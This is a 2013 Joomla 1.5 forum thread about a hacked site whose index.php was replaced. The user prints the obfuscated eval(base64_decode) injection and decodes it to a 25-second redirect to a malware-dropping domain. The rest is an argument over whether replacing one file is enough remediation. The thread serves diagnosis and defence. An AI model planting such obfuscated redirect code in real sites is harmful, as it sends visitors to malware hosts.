[removed] redirect index.php hacked

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Locked
prophotodx
Joomla! Intern
Joomla! Intern
Posts: 76
Joined: Tue Feb 23, 2010 5:36 pm

[removed] redirect index.php hacked

Post by prophotodx » Tue Jan 22, 2013 3:29 pm

Someone hacked one of my client's websites by changing the index.php file in the Joomla root. The site was redirecting after 25 seconds to shopforza .info which was somehow going to [spam].com. I started scanning some files for changed dates and found that /index.php was changed. I opened it and it was Base64 encoded which was a red flag since Joomla is open source.

Code: Select all

<? eval(base64_decode('ZGVmaW5lKCAnX0pFWEVDJRvU3RyaW5nKCRtYWluZnJhbWUtPmdldENmZygnZ3ppcCcpKTs='));?>
That gets decoded to

Code: Select all

define( '_JEXEC', 1 );

define('JPATH_BASE', dirname(__FILE__) );

define( 'DS', DIRECTORY_SEPARATOR );

require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
eval(base64_decode('aGVhZGVyKCJSZTsgdXJsPVwiaHR0cDovL3Nob3Bmb3J6YS5pbmZvL25ldFwiIik7'));
require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' );

JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null;


$mainframe =& JFactory::getApplication('site');



$mainframe->route();



echo JResponse::toString($mainframe->getCfg('gzip'));

Which also has more encoding which decodes to

Code: Select all

header("Refresh: 25; url=\"http://shopforza .info/net\"");
Hopefully this will help someone get their site back and future reference...
Last edited by mandville on Tue Jan 22, 2013 5:11 pm, edited 2 times in total.
Reason: trimmed code, broke links, trimmed hack script.
Why are there so many d-bags around here? Joomla is about community AND a CMS! Don't be a d-bag, explain how to fix the person's issue not just 'go look here and read xyz.com'.

Remember, there is a PERSON behind that username that NEEDS HELP!

prophotodx
Joomla! Intern
Joomla! Intern
Posts: 76
Joined: Tue Feb 23, 2010 5:36 pm

Re: [spam].com redirect index.php hacked

Post by prophotodx » Tue Jan 22, 2013 3:32 pm

This forum's filter is removing the site name which could be important for SEO. My client's site was being redirected to [spam] (dot) com, [spam].com, [spam] .com. I am not spamming! This could help someone find their compromised files quicker and fix their website.

BTW the site was running joomla 1.5.26.
Why are there so many d-bags around here? Joomla is about community AND a CMS! Don't be a d-bag, explain how to fix the person's issue not just 'go look here and read xyz.com'.

Remember, there is a PERSON behind that username that NEEDS HELP!

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: [removed] redirect index.php hacked

Post by mandville » Tue Jan 22, 2013 5:14 pm

please follow the forum stickie regarding posting the fpa to assist us in assisting you.

Regarding your complaint that the forum censor acting properly. how would the hacked site url be relevant and a boost for seo? there is no moral value in promoting /sending someone to a hacked site.
Following the forum stickie and checklist 7 is a great start for getting a hacked site repaired quickly.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

prophotodx
Joomla! Intern
Joomla! Intern
Posts: 76
Joined: Tue Feb 23, 2010 5:36 pm

Re: [removed] redirect index.php hacked

Post by prophotodx » Tue Jan 22, 2013 5:59 pm

mandville wrote:please follow the forum stickie regarding posting the fpa to assist us in assisting you.
Huh? Why? I am posting a solution, not a question. I found out why my site was being redirected and how. I posted this hoping to help someone else.
mandville wrote: Regarding your complaint that the forum censor acting properly. how would the hacked site url be relevant and a boost for seo? there is no moral value in promoting /sending someone to a hacked site.
Following the forum stickie and checklist 7 is a great start for getting a hacked site repaired quickly.
If someone searched for "joomla 1.5 redirect xyz.com" or "joomla 1.5 hacked xyz.com" this post should come up, simple SEO. Obviously that would require the correct domain name to be listed, which your filters are preventing.
Why are there so many d-bags around here? Joomla is about community AND a CMS! Don't be a d-bag, explain how to fix the person's issue not just 'go look here and read xyz.com'.

Remember, there is a PERSON behind that username that NEEDS HELP!

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: [removed] redirect index.php hacked

Post by mandville » Tue Jan 22, 2013 7:44 pm

i can not see how your post actually resolved the hijack/hack etc. if you had searched online you would have found that both the links you posted (including the url in the topic title which is not permitted under forum rules) would have lead the unwary/inquisitive to a malware dropping site including several resolutions to the browser hijack.

from experience "most" people would not search, they would post a help - hacked topic. which of course still leaves the fact you posted direct links to malware dropping sites. now you know the reason they are censored on this forum.

how did you resolve your clients hack?
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

prophotodx
Joomla! Intern
Joomla! Intern
Posts: 76
Joined: Tue Feb 23, 2010 5:36 pm

Re: [removed] redirect index.php hacked

Post by prophotodx » Tue Jan 22, 2013 7:48 pm

mandville wrote:how did you resolve your clients hack?
Um, replaced index.php with a non hacked version...thought that was obvious.
Why are there so many d-bags around here? Joomla is about community AND a CMS! Don't be a d-bag, explain how to fix the person's issue not just 'go look here and read xyz.com'.

Remember, there is a PERSON behind that username that NEEDS HELP!

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 44024
Joined: Sat Apr 05, 2008 9:58 pm

Re: [removed] redirect index.php hacked

Post by Webdongle » Tue Jan 22, 2013 8:33 pm

prophotodx wrote:
mandville wrote:how did you resolve your clients hack?
Um, replaced index.php with a non hacked version...thought that was obvious.
That is equivalent to re painting one wall after someone broke into a building and trashed the place. It does nothing to fix other damage and it does nothing to secure the site to prevent it happening again.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

prophotodx
Joomla! Intern
Joomla! Intern
Posts: 76
Joined: Tue Feb 23, 2010 5:36 pm

Re: [removed] redirect index.php hacked

Post by prophotodx » Tue Jan 22, 2013 8:37 pm

Webdongle wrote:
prophotodx wrote:
mandville wrote:how did you resolve your clients hack?
Um, replaced index.php with a non hacked version...thought that was obvious.
That is equivalent to re painting one wall after someone broke into a building and trashed the place. It does nothing to fix other damage and it does nothing to secure the site to prevent it happening again.
The site has been secured, at least as secure as a 1.5 site can get. It wasn't done before thats why it happened.
Why are there so many d-bags around here? Joomla is about community AND a CMS! Don't be a d-bag, explain how to fix the person's issue not just 'go look here and read xyz.com'.

Remember, there is a PERSON behind that username that NEEDS HELP!

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 44024
Joined: Sat Apr 05, 2008 9:58 pm

Re: [removed] redirect index.php hacked

Post by Webdongle » Tue Jan 22, 2013 9:16 pm

prophotodx wrote:...
The site has been secured... It wasn't done before thats why it happened.
But because you have not deleted all the files then it is not certain the site is secure. You may have looked for other hacked files and not seen any ... but that does not mean they are not there. The only way to be certain is delete all the files and replace with fresh ones.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

prophotodx
Joomla! Intern
Joomla! Intern
Posts: 76
Joined: Tue Feb 23, 2010 5:36 pm

Re: [removed] redirect index.php hacked

Post by prophotodx » Tue Jan 22, 2013 9:28 pm

Webdongle wrote:
prophotodx wrote:...
The site has been secured... It wasn't done before thats why it happened.
But because you have not deleted all the files then it is not certain the site is secure. You may have looked for other hacked files and not seen any ... but that does not mean they are not there. The only way to be certain is delete all the files and replace with fresh ones.
I don't understand why you are arguing with me...SITE HAS BEEN SECURED, THIS IS A POST FOR FUTURE REFERENCE FOR OTHERS...
Why are there so many d-bags around here? Joomla is about community AND a CMS! Don't be a d-bag, explain how to fix the person's issue not just 'go look here and read xyz.com'.

Remember, there is a PERSON behind that username that NEEDS HELP!

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 44024
Joined: Sat Apr 05, 2008 9:58 pm

Re: [removed] redirect index.php hacked

Post by Webdongle » Tue Jan 22, 2013 9:57 pm

prophotodx wrote:...
I don't understand why you are arguing with me...SITE HAS BEEN SECURED...
I am not arguing with you I am telling you a fact. Unless all the files have been deleted then it is not 100% certain the site is secure. It is you that is shouting.

prophotodx wrote:...
THIS IS A POST FOR FUTURE REFERENCE FOR OTHERS...
And that is why the facts must be told. Unless all the files have been deleted then it is not 100% certain the site is secure. On large sites with professional IT staff it is possible to be reasonably sure using other methods. But this forum has many inexperienced users(some even have to be told how to copy/paste). To start a thread as a 'future reference for others' and only state that replacing the "index.php with a non hacked version" ... is at the least very irresponsible.

To start such a thread after making c. 40 posts and asking basic questions is [spam]. If you wish to ignore the advice on http://forum.joomla.org/viewtopic.php?f=432&t=475313 that is up to you. But to make c. 40 posts (that clearly show your lack of knowledge) then give bad advice ... needs to be addressed for the sake of the inexperienced users who read this thread.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

prophotodx
Joomla! Intern
Joomla! Intern
Posts: 76
Joined: Tue Feb 23, 2010 5:36 pm

Re: [removed] redirect index.php hacked

Post by prophotodx » Tue Jan 22, 2013 10:17 pm

Amazing how someone who is supposed to be helping is only continuing to argue with me and tell me I'm a noob when they don't even know me. All you had to say was 'for others with this issue be sure to read through this thread xxxxx.xxxxx to be sure your site is secure' instead of defaming me.
Why are there so many d-bags around here? Joomla is about community AND a CMS! Don't be a d-bag, explain how to fix the person's issue not just 'go look here and read xyz.com'.

Remember, there is a PERSON behind that username that NEEDS HELP!

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 44024
Joined: Sat Apr 05, 2008 9:58 pm

Re: [removed] redirect index.php hacked

Post by Webdongle » Tue Jan 22, 2013 10:50 pm

prophotodx wrote:Amazing how someone who is supposed to be helping is only continuing to argue with me and tell me I'm a noob ...
I am not arguing with you and I am not arguimg with you. I am stating a fact the the many of the users on the forum are inexperienced ... and that it is irresponsible for you to suggest that replacing the index.php file makes the site secure.


prophotodx wrote:... All you had to say was 'for others with this issue be sure to read through this thread xxxxx.xxxxx to be sure your site is secure' instead of defaming me.
I explained why it was necessary to delete all the files. And explained that there are other methods that experienced IT experts can use. Also I explained that your method was not suitable for inexperienced users.

I did not 'defame' you ... all I did was point out you make c. 40 posts asking basic questions then start a thread that has inaccurate and incomplete information.

You are the one that is arguing, you argue when an experienced moderator has the need to edit your posts. And you argue 'black is white' when the facts are placed in front of you. Then you accuse me of just pointing to a 'sticky' thread.

The crux of the matter is that you posted information that was not accurate and could mislead inexperienced users to ignore the most effective method. My posts were(and are not) personal attacks on you. My posts are for the inexperienced users who may have read your posts so they could see the flaws in the logic of what you posted.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

prophotodx
Joomla! Intern
Joomla! Intern
Posts: 76
Joined: Tue Feb 23, 2010 5:36 pm

Re: [removed] redirect index.php hacked

Post by prophotodx » Wed Jan 23, 2013 4:20 pm

Webdongle wrote:I am not arguing with you and I am not arguimg with you. I am stating a fact the the many of the users on the forum are inexperienced ... and that it is irresponsible for you to suggest that replacing the index.php file makes the site secure.
Just the fact that you continue to post and argue that you are not arguing shows your need to be right. Stop posting and then the argument will be over.

Webdongle wrote: The crux of the matter is that you posted information that was not accurate and could mislead inexperienced users to ignore the most effective method. My posts were(and are not) personal attacks on you. My posts are for the inexperienced users who may have read your posts so they could see the flaws in the logic of what you posted.
I consider it a personal attack which is not how a 'experienced moderator' should act. Your actions and attitude are are poor reflection on the joomla community and this forum. No wonder people hate posting here hoping for help, even the mods have a bad attitude.
Why are there so many d-bags around here? Joomla is about community AND a CMS! Don't be a d-bag, explain how to fix the person's issue not just 'go look here and read xyz.com'.

Remember, there is a PERSON behind that username that NEEDS HELP!

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 44024
Joined: Sat Apr 05, 2008 9:58 pm

Re: [removed] redirect index.php hacked

Post by Webdongle » Wed Jan 23, 2013 4:54 pm

prophotodx wrote:...
Just the fact that you continue to post and argue that you are not arguing shows your need to be right. Stop posting and then the argument will be over.
...
Stating facts is not arguing it is debating a point. And the point is the advice you posted was incorrect, inaccurate and misleading to inexperienced users. Your other posts do nothing to qualify your statement and only try to confuse the issue by evading the main point.


prophotodx wrote:...
I consider it a personal attack which is not how a 'experienced moderator' should act. Your actions and attitude are are poor reflection on the joomla community and this forum. No wonder people hate posting here hoping for help, even the mods have a bad attitude.
A difference of opinion is not a personal attack it is just a different opinion ... no more no less. The fact that you take objection with someone having a different opinion to yours is a reflection on you not anyone else. As for you claiming people hate posting here ... The amount of posts(especially solved posts) proves your statement incorrect.

Again(for the inexperienced users who read this thread) ... just replacing the index.php file is not enough to remove the hack and secure the site. Before you post please read this gives specific instructions on how to do that.

There are similar instructions for 2.5 http://forum.joomla.org/viewtopic.php?f=621&t=582854 and 3.0 http://forum.joomla.org/viewtopic.php?f=714&t=757645
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

prophotodx
Joomla! Intern
Joomla! Intern
Posts: 76
Joined: Tue Feb 23, 2010 5:36 pm

Re: [removed] redirect index.php hacked

Post by prophotodx » Wed Jan 23, 2013 4:56 pm

hey look webdongle still can't leave this alone!!! That's a great mod for you...
Why are there so many d-bags around here? Joomla is about community AND a CMS! Don't be a d-bag, explain how to fix the person's issue not just 'go look here and read xyz.com'.

Remember, there is a PERSON behind that username that NEEDS HELP!

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: [removed] redirect index.php hacked

Post by mandville » Wed Jan 23, 2013 6:08 pm

degenerating topic locked
webdongle is not a moderator nor does he claim to be
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}


Locked

Return to “Security in Joomla! 1.5”